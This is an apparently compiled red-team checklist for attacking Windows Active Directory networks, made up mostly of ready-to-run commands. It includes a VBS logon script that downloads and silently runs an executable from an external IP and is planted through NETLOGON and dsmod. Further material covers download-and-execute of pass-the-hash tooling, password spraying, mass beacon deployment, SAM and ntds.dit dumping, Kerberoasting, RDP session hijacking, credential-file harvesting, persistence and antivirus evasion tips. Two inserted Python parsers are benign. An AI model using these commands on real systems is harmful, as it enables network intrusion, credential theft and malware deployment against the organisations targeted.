• Collected from the write-ups of various experts, kept here as a checklist

Basic internal-network penetration flowchart:

AD domain penetration mind map

Domain penetration 0~0.9:

AD domain penetration workflow

[TOC]

After obtaining domain controller privileges, precisely target the ops/admin staff:


As for exporting Windows logs, the system already ships with a very handy log management tool, wevtutil. The command below exports every log entry with event ID 4624 [successful logon; in most cases we only need the successful logons] within the time window 4449183132 [the chosen period converted to the corresponding timestamp value] into the file risalogs.evtx in the specified directory; afterwards, find a way to pull that file back locally for analysis.

# Export logs on the domain controller:

beacon> shell hostname
beacon> shell wevtutil epl Security c:\windows\logs\risalogs.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] and System[(EventID=4624) and TimeCreated[timediff(@SystemTime) <= 4449183132]]]"
beacon> shell tasklist | findstr "wevtutil.exe"
beacon> shell dir c:\windows\logs\risalogs.evtx
beacon> download c:\windows\logs\risalogs.evtx
beacon> downloads

# Local log filtering:

LogParser.exe -i:EVT -o csv "SELECT TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as NAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) as IP FROM c:\risalogs.evtx" > C:\log.txt

# Filter the logs:

# grep -v '\$' log.txt | sort | uniq | egrep -v 'ANONYMOUS LOGON|-|:' > login_succeed.txt
# head -n 25 login_succeed.txt
# wc -l login_succeed.txt

Example, taking the user loecho:

# grep 'loecho' login_succeed.txt # filter out the IPs this user logged on from
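Added example (not from the original checklist): a small Python helper that builds the wevtutil XPath filter for a given number of days and applies the same filtering as the grep/sort/uniq pipeline above to LogParser's NAME,IP output. The CSV sample and the function names are constructed; timediff(@SystemTime) in event-log XPath is compared in milliseconds, so the 4449183132 used above corresponds to roughly 51.5 days.

```python
import csv
import io


def build_4624_query(days, logon_type=3):
    """XPath for `wevtutil epl Security ... /q:` selecting successful logons
    (EventID 4624) of the given LogonType within the last `days` days.
    timediff(@SystemTime) is compared in milliseconds."""
    window_ms = days * 24 * 60 * 60 * 1000
    return (
        f"*[EventData[Data[@Name='LogonType']='{logon_type}'] and "
        f"System[(EventID=4624) and TimeCreated[timediff(@SystemTime) <= {window_ms}]]]"
    )


# Constructed sample in the shape of the LogParser query's output (NAME,IP).
CONSTRUCTED_LOG_CSV = """NAME,IP
WIN-DC01$,10.1.1.5
LOECHO,10.1.2.33
ANONYMOUS LOGON,10.1.9.9
LOECHO,10.1.2.33
OPSADMIN,-
OPSADMIN,10.1.2.40
BOSS,fe80::1
"""


def successful_logons(csv_text):
    """Mirror of `grep -v '\\$' | sort | uniq | egrep -v 'ANONYMOUS LOGON|-|:'`:
    drop machine accounts (trailing $), ANONYMOUS LOGON, and rows with no
    usable source address ('-' or an IPv6 address containing ':'), then
    de-duplicate. Unlike the grep one-liner, '-' and ':' are only tested on
    the IP column, so user names containing a hyphen are not lost."""
    seen = set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row["NAME"].strip().upper()
        ip = row["IP"].strip()
        if name.endswith("$") or name == "ANONYMOUS LOGON":
            continue
        if ip == "-" or ":" in ip:
            continue
        seen.add((name, ip))
    return sorted(seen)


def source_ips_for(csv_text, user):
    """Equivalent of `grep 'loecho' login_succeed.txt`: the source IPs one
    account logged on from."""
    return sorted({ip for name, ip in successful_logons(csv_text) if name == user.upper()})
```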

# Lateral movement to a specified machine - method 1:

beacon> shell net use \\WIN-HK0SO5MHHQ6\c$ /user:"study\Administrator" "hello.!@#45"
beacon> shell copy c:\windows\logs\dpx\cvsrds.exe \\WIN-HK0SO5MHHQ6\admin$\help\help\
beacon> shell dir \\WIN-HK0SO5MHHQ6\admin$\help\help\
beacon> shell wmiexec.exe study/Administrator:hello.!@#45@WIN-HK0SO5MHHQ6 "c:\windows\help\help\cvsrds.exe"
beacon> rm wmiexec.exe
beacon> rm cvsrds.exe
beacon> shell net use * /del /yes


# Lateral movement to a specified machine - method 2:

First, find a way to get a beacon shell back from the target's primary DC, then look up the current domain group-policy script directory, i.e. the path behind the NETLOGON share. The VBS payload prepared below is uploaded into that directory, so that the next time the target reboots and logs on, the script in it is loaded and executed automatically.

beacon> shell net time /domain # how to identify the primary DC was covered earlier; net time shows it
beacon> shell hostname
beacon> shell net share # NETLOGON script directory; upload the callback VBS here


' Logon script from the page: fetches cvsrds.exe and starts it with a hidden window
strFileURL = "http://21.65.87.33:80/cvsrds.exe"
strHDLocation = "c:\windows\temp\cvsrds.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If
Set objXMLHTTP = Nothing
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")
val = ws.Run("c:\windows\temp\cvsrds.exe", 0)

# The most important step: use dsmod to modify the target domain user's attributes, i.e. add the logon script we just prepared to that user, as follows

beacon> shell dsquery user | findstr "boss"
beacon> shell dsmod user -loscr "info.vbs" "CN=boss,CN=Users,DC=god,DC=org"
beacon> shell gpupdate /force


# A small extension [ via a batch loop around dsmod, add the logon script to several specified users at once so that many domain hosts call back; in practice it is not advisable to seed too many at a time, be selective ]

# for /f %i in (user.txt) do dsmod user -loscr "info.vbs" "CN=%i,CN=Users,DC=god,DC=org"
# type user.txt

# Be sure to delete the corresponding logon scripts as soon as all target machines have called back and are stable

Batch dependency-free lateral movement via WMI (445 password spraying):

# for /f %i in (host.txt) do net use \\%i\admin$ /user:"administrator" "Admin12345" && if %errorlevel% equ 0 ( echo %i >> c:\windows\temp\login_succeed.txt ) && net use \\%i\admin$ /del

Batch hash dumping over 445:

# for /f %i in (host.txt) do psexec \\%i -accepteula -u administrator -p Admin12345 -c C:\Tools\QuarksPwDump.exe -dhl -o C:\windows\temp\%i.txt && move /y \\%i\admin$\temp\%i.txt c:\windows\temp\

Batch dependency-free PTH:

# powershell -exec bypass
PS > IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-TheHash.ps1');
PS > IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1');
PS > Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Domain . -Username administrator -Hash ccef208c6485269c20db2cad21734fe7

Batch CS beacon deployment:

for /f %i in (host.txt) do net use \\%i\admin$ /user:"administrator" "Admin12345" && copy C:\Tools\beacon.exe \\%i\admin$\temp\ && wmic /node:%i /user:administrator /password:Admin12345 PROCESS call create "\\%i\admin$\temp\beacon.exe" && net use \\%i\admin$ /del

Impacket usage manual

0x01 WMI

Remote non-interactive command execution with a plaintext password or via PTH
# python3 wmiexec.py ./administrator:'admin!@#45'@172.23.119.106 "quser" -codec gbk
# python3 wmiexec.py -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.91 'quser' -codec gbk

Remote non-interactive execution of cmd or PowerShell commands
# python3 wmiexec.py -shell-type cmd ./administrator:'admin!@#45'@172.23.119.81 "quser" -codec gbk
# python3 wmiexec.py -shell-type powershell -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.81 'get-host' -codec gbk

Cmd or PowerShell remote interactive shell
# python3 wmiexec.py -shell-type cmd ./administrator:'abc123!@#45'@172.23.119.109 -codec gbk
# python3 wmiexec.py -shell-type powershell -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.109 -codec gbk

Add execution timestamps and verbose debug output (helps with later troubleshooting) [ note: the default named pipe is easily recognised by AV ]
# python3 wmiexec.py -ts -debug ./administrator:'Admin12345'@172.23.119.86 "quser" -codec gbk
# python3 wmiexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.119 'net group "domain admins" /domain' -codec gbk

Execute the command only, without fetching its output; this uses a single port, so a blocked 445 does not make the whole execution fail
# python3 wmiexec.py -nooutput ./administrator:'abc123!@#45'@172.23.119.82 "quser > C:\Users\Public\Documents\logs.txt" -codec gbk
# python3 wmiexec.py -nooutput -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.82 'tasklist> C:\Users\Public\Documents\logs.txt' -codec gbk

0x02 DCOM

Remote non-interactive command execution; supports the ShellWindows, ShellBrowserWindow and MMC20 objects
# python3 dcomexec.py -ts -debug -object MMC20 ./administrator:'admin!@#45'@172.23.119.91 "quser" -codec gbk
# python3 dcomexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f -object MMC20 klion/sysadm:@172.23.119.91 "quser" -codec gbk

DCOM remote interactive shell
# python3 dcomexec.py -ts -debug -object MMC20 ./administrator:'admin!@#45'@172.23.119.91 -codec gbk
# python3 dcomexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f -shell-type powershell -object MMC20 klion/sysadm:@172.23.119.91 -codec gbk # very likely to be blocked

0x03 Scheduled tasks
Remote non-interactive command execution, SYSTEM privileges by default
# python3 atexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.91 "quser" -codec gbk
# python3 atexec.py -ts -debug ./administrator:'admin!@#45'@172.23.119.91 'dir c:\' -codec gbk

0x04 SMB
Remote interactive shell, SYSTEM privileges by default
# python3 smbexec.py -ts -debug -hashes :518B98AD4178A53695DC997AA02D455C ./administrator@172.23.119.81 -codec gbk
# python3 smbexec.py -ts -debug klion/sysadm:'admin!@#45'@172.23.119.81 -codec gbk
# python3 psexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.51 'net group "domain admins" /domain'
# python3 psexec.py -ts -debug ./administrator:'admin!@#45'@172.23.119.106 'net group "domain admins" /domain'
# python3 psexec.py -ts -debug ./administrator:'admin!@#45'@172.23.119.106 'net group "domain controllers" /domain'

0x05 Remote hash dumping
Dump local hashes
Remote online hash dump
# python3 secretsdump.py -hashes :518B98AD4178A53695DC997AA02D455C ./administrator@172.23.119.51 -outputfile 172.23.119.51.hash.txt

Local offline hash extraction

# python3 wmiexec.py -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.51 -codec gbk
# cd c:\users\public\documents
# reg save HKLM\SYSTEM sys.hiv
# reg save HKLM\SAM sam.hiv
# reg save hklm\security security.hiv
# lget sys.hiv
# lget security.hiv
# lget sam.hiv
# python3 secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL -outputfile 6.Hash.txt

Dump ntds.dit
Remote online ntds.dit dump
# python3 secretsdump.py -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.120 -outputfile klion.local.ntds.txt
# python3 secretsdump.py klion/administrator:'Admin12345'@172.23.119.120 -outputfile klion.local.ntds.txt

Local offline ntds.dit extraction
# python3 wmiexec.py -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.120 -codec gbk
# cd c:\users\public\documents
# vssadmin list shadows
# vssadmin create shadow /for=c:
# copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\ntds.dit c:\users\public\documents\ntds.dit /Y
# vssadmin delete shadows /for=c: /quiet
# reg save hklm\system system.hiv
# lput gosecretsdump.exe
# gosecretsdump.exe -history -ntds ntds.dit -system system.hiv -out klion.local.txt # extract on the target machine
# python3 secretsdump.py -system system.hiv -ntds ntds.dit LOCAL -outputfile klion.ntds.dit # pull back and extract locally

0x06 Use from outside the domain
# python3 GetUserSPNs.py klion.local/WenYa.xue:'xwy123!@#45' -dc-ip 172.23.119.120 -request # Kerberoasting
# python3 GetNPUsers.py klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 -request # AS-REP roasting
# python3 GetADUsers.py klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 -all # fetch the list of users in the target domain
# python3 findDelegation.py klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 # query delegation in the target domain
# python3 lookupsid.py -ts ./administrator:'admin!@#45'@172.23.119.120 # enumerate the target system's users (RPC)
# python3 netview.py -debug klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 # batch-collect user logon sessions on live hosts in the domain
# python3 getTGT.py -debug klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 # obtain a ticket for the specified domain user
# python3 getArch.py -target 192.168.159.11 # check the target system's architecture (32/64-bit)
# python3 rpcdump.py ./administrator:'admin!@#45'@172.23.119.120 # dump RPC endpoints remotely

0x07 Remotely extract mailbox information from the target Exchange server
# python3 exchanger.py -rpc-hostname Ex2010SP3 klion/its:'admin!@#45'@192.168.159.12 nspi list-tables
# python3 exchanger.py -rpc-hostname Ex2010SP3 klion/its:'admin!@#45'@192.168.159.12 nspi dump-tables -guid 57f0c459-519c-47f8-9e1b-f83a1f8a51a8

Hijacking the Administrator RDP session from the GUEST user

Log in as the guest user and use RDP session hijacking to take over the administrator's session.

query user

sc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"      # 1 is the target session ID; rdp-tcp#4 is the current session name

net start tide

Browser-related:

1. Browser download history
2. Browser browsing history
3. Account names and passwords saved by the browser
4. Browser bookmarks

# GitHub projects
https://github.com/GhostPack/Seatbelt # harvests browser bookmarks and other sensitive assets on the machine

https://github.com/moonD4rk/HackBrowserData # hackbrowserdata is a tool for decrypting and exporting browser data (passwords | history | cookies | bookmarks); supports mainstream browsers on all platforms

https://github.com/AlessandroZ/LaZagne # LaZagne is an open-source project that retrieves the many passwords stored by applications on the local computer

https://github.com/uknowsec/SharpDecryptPwd # decrypts passwords of commonly used software, e.g. Navicat, WinSCP

Recently opened files:

C:\Users\[User]\AppData\Roaming\Microsoft\Windows\Recent

Firewall configuration

netsh advfirewall show allprofiles

RDP connection history

cmdkey /list

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\servers"

reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\DEFAULT"

Startup items

wmic startup get command,caption

REG QUERY HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Service information

wmic service list brief

Check whether DHCP or other third-party services are running

Installed programs

wmic product get name,version


powershell "Get-WmiObject -class Win32_Product | Select-Object -Property name,version"

Sensitive files:

# Windows:

findstr /si password  config.*  *.ini *.txt *.properties

dir /a /s /b d:\"*.txt"
dir /a /s /b d:\"*.xml"
dir /a /s /b d:\"*.mdb"
dir /a /s /b d:\"*.sql"
dir /a /s /b d:\"*.mdf"
dir /a /s /b d:\"*.eml"
dir /a /s /b d:\"*.pst"
dir /a /s /b d:\"*conf*"
dir /a /s /b d:\"*bak*"
dir /a /s /b d:\"*pwd*"
dir /a /s /b d:\"*pass*"
dir /a /s /b d:\"*login*"
dir /a /s /b d:\"*user*"

# Linux
find / -name "*.properties"
grep -r "<search term>" <directory>


#!/bin/bash
# by forum.ywhack.com

# output file
filename=$(date +%s)'.log'

echo "信息收集"
echo -e "\n" | tee -a $filename
echo "账户信息收集" | tee -a $filename
cat /etc/passwd | tee -a $filename
echo -e "\n" | tee -a $filename
echo "shadow" | tee -a $filename
cat /etc/shadow | tee -a $filename
echo -e "\n" | tee -a $filename
echo "进程信息收集" | tee -a $filename
ps aux | tee -a $filename
echo -e "\n" | tee -a $filename
echo "网络连接" | tee -a $filename
netstat -antlp | tee -a $filename
echo -e "\n" | tee -a $filename
echo "当前用户:" $(whoami) 2>/dev/null | tee -a $filename
echo -e "\n" | tee -a $filename
echo "端口监听" | tee -a $filename
netstat -lnpt | tee -a $filename
echo -e "\n" | tee -a $filename
echo "可登陆用户" | tee -a $filename
cat /etc/passwd | grep -E -v 'nologin$|false' | tee -a $filename
echo -e "\n" | tee -a $filename
echo "增加用户的日志" | tee -a $filename
grep "useradd" /var/log/secure  | tee -a $filename
echo -e "\n" | tee -a $filename
echo "History操作提取" | tee -a $filename
cat ~/.*history | tee -a $filename
echo -e "\n" | tee -a $filename
echo "登录成功的IP" | tee -a $filename
# 'more' removed from the pipeline: it only pages interactively and would stall a non-interactive run
grep "Accepted " /var/log/secure* | awk '{print $11}' | sort | uniq -c | sort -nr | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看路由表" | tee -a $filename
route -n | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 SSH key" | tee -a $filename
sshkey=${HOME}/.ssh/authorized_keys
if [ -e "${sshkey}" ]; then
    cat ${sshkey} | tee -a $filename
else
    echo -e "SSH key文件不存在\n" | tee -a $filename
fi
echo -e "\n" | tee -a $filename
echo "查看 known_hosts" | tee -a $filename
cat ~/.ssh/known_hosts | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查找WEB-INF" | tee -a $filename
# glob quoted so the shell does not expand it in the current directory
find / -name "*.properties" 2>/dev/null | grep WEB-INF | tee -a $filename
echo -e "\n" | tee -a $filename
echo "user|pass|pwd|uname|login|db_" | tee -a $filename
find / -name "*.properties" 2>/dev/null | xargs egrep -i "user|pass|pwd|uname|login|db_" | tee -a $filename
echo -e "\n" | tee -a $filename
echo "jdbc:|pass=|passwd=" | tee -a $filename
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.sh" 2>/dev/null | xargs grep -E "=jdbc:|pass=|passwd=" | tee -a $filename
echo -e "\n" | tee -a $filename
# Author cances
echo "ip和网卡信息" | tee -a $filename
ip a | awk '{print $2,$4}' | tee -a $filename
echo -e "\n" | tee -a $filename
echo "可登陆用户" | tee -a $filename
cat /etc/passwd | grep -E -v 'sync$|halt$|nologin$|false|shutdown' | tee -a $filename
echo -e "\n" | tee -a $filename
echo "用户登陆日志" | tee -a $filename
lastlog | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 hosts" | tee -a $filename
cat /etc/hosts | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 系统版本" | tee -a $filename
cat /etc/*-release | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 内核版本" | tee -a $filename
uname -mrs | tee -a $filename

Simple Windows subnet discovery:

@echo off

rem automatic discovery of live internal subnets [Windows]

setlocal enabledelayedexpansion

for /l %%i in (0,1,255) do (
  for /l %%k in (0,1,255) do (
    ping -w 1 -n 1 10.%%i.%%k.1 | findstr "TTL=" >nul || ping -w 1 -n 1 10.%%i.%%k.254 | findstr "TTL=" >nul
    if !errorlevel! equ 0 (echo 10.%%i.%%k.0/24 is alive ! >> alive.txt ) else (echo 10.%%i.%%k.0/24 May be sleeping ! )
  )
)

for /l %%s in (16,1,31) do (
  for /l %%d in (0,1,255) do (
    ping -n 1 -w 1 172.%%s.%%d.1  | findstr "TTL=" >nul || ping -w 1 -n 1 172.%%s.%%d.254 | findstr "TTL=" >nul
    if !errorlevel! equ 0 (echo 172.%%s.%%d.0/24 is alive ! >> alive.txt ) else (echo 172.%%s.%%d.0/24 May be sleeping ! )
  )
)

for /l %%t in (0,1,255) do (
  ping -n 1 -w 1 192.168.%%t.1  | findstr "TTL=" >nul || ping -n 1 -w 1 192.168.%%t.254 | findstr "TTL=" >nul
  if !errorlevel! equ 0 (echo 192.168.%%t.0/24 is alive ! >> alive.txt ) else (echo 192.168.%%t.0/24 May be sleeping ! )
)

Basic persistence - autorun:

REG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SysDebug" /t REG_SZ /F /D "c:\windows\debug\SysDebug.exe"
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SysDebug" /f

High-privilege scheduled task:

schtasks /create /RL HIGHEST /F /tn "SysDebug" /tr "c:\windows\debug\SysDebug.exe" /sc DAILY /mo 1 /ST 10:05 /RU SYSTEM
schtasks /query | findstr "SysDebug"
schtasks /run /tn "SysDebug"
schtasks /delete /F /tn "SysDebug"
schtasks /query /tn "SysDebug" /fo list /v

Low-privilege scheduled task:

schtasks /create /F /tn "SysDebug" /tr "D:\用户文档\sixj\Contacts\SysDebug.exe" /sc DAILY /mo 1 /ST 10:05
schtasks /query | findstr "SysDebug"
schtasks /run /tn "SysDebug"
schtasks /delete /F /tn "SysDebug"
schtasks /query /tn "SysDebug" /fo list /v

Single-host information collection:

# 1. Basic files of all kinds, keyword search:

  getFile.exe all # in-house file search tool

# 2. Software installed on the host, to determine what kind of host it is:

wmic OS get Caption,CSDVersion,Version,OSArchitecture


# 3. Grab everything in one go and pull it back for local analysis

Seatbelt.exe all #

# 4. Focus on sensitive software in the process list and check whether credentials are present

tasklist /svc | findstr /i "Mail KeePass"

AD domain penetration - the most important part

findstr /c:"userName=" /c:"cpassword=" /si \\ad\sysvol\xxxx.com\policies\*.xml

net time /domain && net view ad && dir \\ad\NETLOGON && type \\ad\NETLOGON\chapwd.cmd

AD domain penetration - in-domain information collection:

powershell-import /home/xxxx/Desktop/SharpHound.ps1

powershell Invoke-BloodHound -CollectionMethod All

execute-assembly BloodHound.exe

AD domain penetration - obtaining user tickets and credentials:

# Via VBS:

cscript GetUserSPN.vbs

# Obtain service ticket hashes with Rubeus and crack them offline with hashcat:

Rubeus.exe kerberoast

hashcat.exe -m 13100 hash.txt -a 3 -1 ?1?d?s?1?1?1?1?1?1

AD domain penetration - SMB scanning (quickly find Windows hosts on the internal network)

1. Plain nbtscan.exe; needs AV-evasion handling for real engagements:

nbtscan.exe 10.10.10.0/16 >> smb.txt

2. fscan.exe, also needs handling for real engagements:

fscan.exe -h 10.10.10.0/16 -m nbtbios -o smb.txt

3. Harsh environments, forward proxy:

Proxy msf in, lower the thread count to 10, and use the smb_version module for discovery

4. cme Windows host discovery; compile your own AV-evaded build for real engagements

cme.exe -t 10.10.10.0/24 

tasklist /svc | findstr "cme.exe"

5. SharpNetInfoScan, resolves via port 139:

SharpNetInfoScan.exe -h 10.10.10.10/24

6. Windows host discovery based on SPN results:

grep 'CN=' spn.txt | awk -F ',' '{print $1}' | awk -F '=' '{print $2}' > host.txt
tail -n 30 host.txt
for /f "delims=" %i in (host.txt) do @ping -w 1 -n 1 %i | findstr /c:".xxx.com|" >> host_res.txt

# Windows 7 and later ship setspn by default

setspn -T DC-Name -Q */* | findstr "MSSQLSvc" # filter MSSQL services directly

# Because the hosts in the SPN results may no longer be alive, batch-ping them to check

awk -F "/" '{print $2}' mac.txt | awk -F "." '{print $1}' | uniq > res.txt

for /f "delims=" %i in (res.txt) do @ping -w 1 -n 1 %i | findstr /c:" DC-name " >> C:\PerfLogs\news.txt

setspn -T dc-name -Q */* | findstr "oracle" # likewise filter Oracle services; other database services the same way
Use SPNs to quickly locate all live LDAP servers in the current target domain:
# Normally these are the domain controllers

setspn -T dc-name -Q */* | findstr "ldap" # the machine names of all LDAP SPNs carry the typical DC marker
Use SPNs to quickly locate the mail servers in the current target domain:
setspn -T dc-name -Q */* | findstr "exchangeMDB"
setspn -T dc-name -Q */* | findstr "SMTPSVC"
setspn -T dc-name -Q */* | findstr "IMAP"
setspn -T dc-name -Q */* | findstr "POP3"

awk -F '/' '{print $2}' mail.txt | awk -F '.' '{print $1}' | uniq # filter out the host names of each kind

# Batch liveness check

for /f "delims=" %i in (mail.txt) do @ping -w 1 -n 1 %i | findstr /c:" dc-name " >> mail-re.txt

Use SPNs to quickly locate the web servers in the current target domain:

setspn -T dc-name -Q */* | findstr "HTTP"
setspn -T dc-name -Q */* | findstr "HTTPS"
for /f "delims=" %i in (webs.txt) do @ping -w 1 -n 1 %i | findstr /c:" dc-name " >> # web servers

Use SPNs to quickly locate all live DNS servers in the current target domain

setspn -T dc-name -Q */* | findstr "DNS"
for /f "delims=" %i in (dns.txt) do @ping -w 1 -n 1 %i | findstr /c:" dc-name " >> dns-res.txt

Use SPNs to quickly locate all live file servers in the current target domain

setspn -T dc-name -Q */* | findstr "ftp"
setspn -T dc-name -Q */* | findstr "nfs"

for /f "delims=" %i in (ftp.txt) do @ping -w 1 -n 1 %i | findstr /c:" dc-name " >> ftp-res.txt

Use SPNs to quickly locate all servers in the current target domain with remote-access services enabled
setspn -T dc-name -Q */* | findstr "TERMSRV" >> C:\PerfLogs\rdp.txt
setspn -T dc-name -Q */* | findstr "WSMAN" >> C:\PerfLogs\winrm.txt
setspn -T dc-name -Q */* | findstr "vnc" >> C:\PerfLogs\vnc.txt
setspn -T dc-name -Q */* | findstr "vpn" >> C:\PerfLogs\vpn.txt
setspn -T dc-name -Q */* | findstr "tnetdgines" >> C:\PerfLogs\tnetdgines.txt
awk -F '/' '{print $2}' *.txt | awk -F '.' '{print $1}' | uniq | wc -l
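Added example (not part of the original checklist): a Python parser for `setspn -T <domain> -Q */*` output that groups host names by SPN service class, replacing the many per-class findstr/awk one-liners in this and the previous SPN block (MSSQLSvc, ldap, exchangeMDB, TERMSRV, HTTP, DNS, ftp and so on) with one inventory pass; the same listing tells a defender which hosts advertise which services and which account owns each SPN. The sample setspn output and the function names are constructed.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of `setspn -T corp.local -Q */*` output:
# an owner DN line followed by its SPNs, one per indented line.
SAMPLE_SETSPN = """Checking domain DC=corp,DC=local
CN=SQL01,CN=Computers,DC=corp,DC=local
\tMSSQLSvc/sql01.corp.local:1433
\tMSSQLSvc/sql01.corp.local
\tTERMSRV/sql01.corp.local
\tTERMSRV/SQL01
CN=DC01,OU=Domain Controllers,DC=corp,DC=local
\tldap/dc01.corp.local/corp.local
\tDNS/dc01.corp.local
\tHOST/dc01.corp.local
CN=svc_mail,CN=Users,DC=corp,DC=local
\texchangeMDB/mail01.corp.local
\tSMTPSVC/mail01.corp.local
\tHTTP/mail01.corp.local
Existing SPN found!
"""

# serviceclass/host[:port][/servicename]
SPN_RE = re.compile(r"^\s+([^/]+)/([^:/\s]+)(?::(\d+))?(?:/(\S+))?\s*$")


def parse_setspn(text):
    """Return (by_class, owner): by_class maps a lower-cased service class to
    the set of short host names advertising it (the awk -F '/' ... -F '.'
    step above); owner maps each short host name to the DN it was first
    listed under."""
    by_class = defaultdict(set)
    owner = {}
    current_dn = None
    for line in text.splitlines():
        if line.startswith("CN="):
            current_dn = line.strip()
            continue
        m = SPN_RE.match(line)
        if not m:
            continue  # "Checking domain ...", "Existing SPN found!" etc.
        svc, host, _port, _svc_name = m.groups()
        short = host.split(".")[0].upper()
        by_class[svc.lower()].add(short)
        owner.setdefault(short, current_dn)
    return dict(by_class), owner


def hosts_for(by_class, *classes):
    """Union of hosts advertising any of the given service classes,
    case-insensitive, e.g. hosts_for(bc, "exchangeMDB", "SMTPSVC", "IMAP", "POP3")."""
    return sorted(set().union(*(by_class.get(c.lower(), set()) for c in classes)))
```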

AD domain penetration - locating external/internal assets:

grep 'CN=' spn.txt | awk -F ',' '{print $1}' | awk -F '=' '{print $2}' > host_res.txt

# Linux: (filter out the key hosts)

egrep -i 'sql|file|vpn|mail|smtp|pop|imap|web|share|monitor|erp|login|oa|print|server|vcenter|vm'

# Collect the target's various external domain names into one file, domain.txt

for /f "delims=" %i in (domain.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> web-out.txt


# With the rough C-class ranges obtained above, batch-identify web titles to determine the applications in each range:

1. Web title / fingerprint collection with fscan

fscan.exe -hf target.txt -nopoc -nop -o title.txt 

2. Ladon

Ladon.exe WhatWeb 10.10.10.0/16 >> title.txt

3. Harsh environments, liveness check:

for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl"

# Export to text files:
@for /l %i in (1,1,255) do @ping -n 1 -w 40 192.168.0.%i & if errorlevel 1 (echo 192.168.0.%i>>c:\a.txt) else (echo 192.168.0.%i >>c:\b.txt)

AD domain penetration - information collection

This runs through every phase of lateral movement: each time a new set of privileges is obtained, do it again

1. Batch-dump process lists and filter for sensitive processes and sensitive users; with good odds you can forge a token directly and obtain domain controller privileges:

(1) Use atexec to obtain the process list, save it locally and filter manually

  ## On the operator machine:
  
   Inject with mimikatz (inject the target host's ticket), proxy the local machine in, then proceed:
   atexec.exe ./administrator:loecho@123..@10.10.10.1 "tasklist"
   
  ## On the compromised host:
  
  Inject the current Beacon into the corresponding process to obtain the target's privileges
  atexec.exe ./administrator:loecho@123..@10.10.10.1 "tasklist"
 
 ## 1. Batch grab, assuming the same password across users, then filter for key processes:
 
 for /f "delims=" %i in (win2success.txt) do atexec.exe ./administrator:loecho123..@%i "tasklist" >> allTasklist.txt

# Filter for key processes: AV, databases, phpstudy, VPN, domain-admin users (add the real domain admin names) etc.

egrep 'cily|adadmin|adadmin02|xxxx-igrp|leagsoft|shenluyan|xiefp|wulh|sunyingyun|zhangx' process.txt

## 2. Grab without extra tools, using the built-in tasklist

for /f %i in (ip.txt) do echo %i >> process.txt & tasklist /s %i /u ".\administrator" /p "loecho123.." /V /FO CSV >> process.txt

egrep 'cily|adadmin|adadmin02|xxxx-igrp|leagsoft|shenluyan|xiefp|wulh|sunyingyun|zhangx' process.txt
  1. Batch-dump hashes and passwords from hosts whose credentials are already known:

(The credential-dumping tool must be AV-evaded, or simply dump lsass.exe and extract offline)

Manual way, relying on scheduled tasks; files64.exe is a modified, AV-evaded one-shot Mimikatz build:

